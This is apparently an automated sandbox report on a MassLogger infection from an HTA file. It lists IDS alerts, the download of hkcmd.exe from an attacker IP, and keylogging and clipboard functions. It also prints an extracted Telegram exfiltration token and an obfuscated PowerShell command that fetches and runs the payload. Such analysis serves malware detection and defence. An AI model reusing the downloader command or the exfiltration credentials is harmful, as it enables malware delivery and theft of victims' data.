                    2025-04-13T11:58:33.374057+020020220511A Network Trojan was detected104.168.7.1880192.168.2.449716TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-13T11:58:40.609825+020028032742Potentially Bad Traffic192.168.2.449717132.226.8.16980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0000000D.00000002.2452508596.00000000023A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\hkcmd[1].exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeReversingLabs: Detection: 63%
                    Source: shegivenmekissinglips.htaVirustotal: Detection: 42%Perma Link
                    Source: shegivenmekissinglips.htaReversingLabs: Detection: 30%
                    Source: Submited SampleNeural Call Log Analysis: 98.4%

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49718 version: TLS 1.0
                    Source: Binary string: wntdll.pdbUGP source: hkcmd.exe, 0000000C.00000003.1317825955.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 0000000C.00000003.1316553254.0000000003C10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: hkcmd.exe, 0000000C.00000003.1317825955.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 0000000C.00000003.1316553254.0000000003C10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q7C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.pdb source: powershell.exe, 00000003.00000002.1323680110.00000000049FB000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB445A GetFileAttributesW,FindFirstFileW,FindClose,12_2_00EB445A
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBC6D1 FindFirstFileW,FindClose,12_2_00EBC6D1
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_00EBC75C
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00EBEF95
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00EBF0F2
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_00EBF3F3
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00EB37EF
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00EB3B12
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_00EBBCBC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02239731h13_2_02239480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02239E5Ah13_2_02239A30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02239E5Ah13_2_02239D87
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F6F700h13_2_04F6F458
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F676D0h13_2_04F67428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F68830h13_2_04F68588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F647C9h13_2_04F64520
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F65929h13_2_04F65680
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F6E9F8h13_2_04F6E750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F6F2A8h13_2_04F6F000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F6E5A0h13_2_04F6E180
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F67278h13_2_04F67160
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F683D8h13_2_04F68130
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F654D1h13_2_04F65228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F67F80h13_2_04F67CD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F65079h13_2_04F64DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F67278h13_2_04F66FD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F6FB58h13_2_04F6F8B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F67B28h13_2_04F67880
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F64C21h13_2_04F64978
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F65E15h13_2_04F65AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F6EE50h13_2_04F6EBA8

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 104.168.7.18:80 -> 192.168.2.4:49716
                    Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 104.168.7.18:80 -> 192.168.2.4:49716
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Apr 2025 09:58:33 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Wed, 09 Apr 2025 05:25:58 GMTETag: "e8200-63251b443439d"Accept-Ranges: bytesContent-Length: 950784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d0 04 f6 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 a0 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0e 00 00 04 00 00 da ab 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 38 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 f8 01 00 00 70 0c 00 00 fa 01 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 70 0e 00 00 72 00 00 00 10 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                    Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49717 -> 132.226.8.169:80
                    Source: global trafficHTTP traffic detected: GET /346/hkcmd.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.7.18Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49718 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.18
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_02787A18 URLDownloadToFileW,3_2_02787A18
                    Source: global trafficHTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /346/hkcmd.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.7.18Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: powershell.exe, 00000003.00000002.1323680110.00000000049FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.18/346/hkcmd.ex
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.18/346/hkcmd.exe
                    Source: powershell.exe, 00000003.00000002.1329147941.0000000007CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.18/346/hkcmd.exe2
                    Source: powershell.exe, 00000003.00000002.1329147941.0000000007CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.18/346/hkcmd.exeP
                    Source: powershell.exe, 00000003.00000002.1329147941.0000000007CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.18/346/hkcmd.exeZ
                    Source: powershell.exe, 00000003.00000002.1329147941.0000000007CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.18/346/hkcmd.exev
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.000000000240E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2452508596.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 0000000D.00000002.2451505649.0000000000728000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2452508596.00000000023A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: hkcmd.exe, 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: powershell.exe, 00000003.00000002.1323024111.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro(
                    Source: powershell.exe, 00000003.00000002.1325868075.0000000005637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.000000000243D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.000000000243D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1323680110.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2452508596.00000000023A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1323680110.00000000045D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: hkcmd.exe, 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: powershell.exe, 00000003.00000002.1325868075.0000000005637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.1325868075.0000000005637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.1325868075.0000000005637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1329147941.0000000007CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comMicrosoft
                    Source: powershell.exe, 00000003.00000002.1325868075.0000000005637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: hkcmd.exe, 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2452508596.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161d
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_00EC4164
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_00EC4164
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EC3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00EC3F66
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,12_2_00EB001C
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EDCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_00EDCABC

                    System Summary

                    barindex
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7